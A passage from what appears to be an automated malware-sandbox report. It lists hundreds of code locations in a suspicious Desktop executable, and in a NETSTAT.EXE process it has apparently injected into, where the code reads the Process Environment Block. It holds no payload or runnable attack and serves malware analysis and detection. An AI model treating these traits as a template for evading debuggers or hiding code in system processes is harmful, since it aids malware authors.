          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C4740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C4740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C4740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C28DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BFA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B97D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C48D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C2FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C48ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C2FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B88794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B74F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B74F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C48F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C4070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C4070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03871B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03871B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0391D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03894BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03894BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03894BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03935BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03938B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03893B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03893B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03878A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03883A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03865210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03865210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03865210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03865210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038F4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0391B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0391B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03938A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038F41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03884120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03884120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03884120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03884120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03884120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]
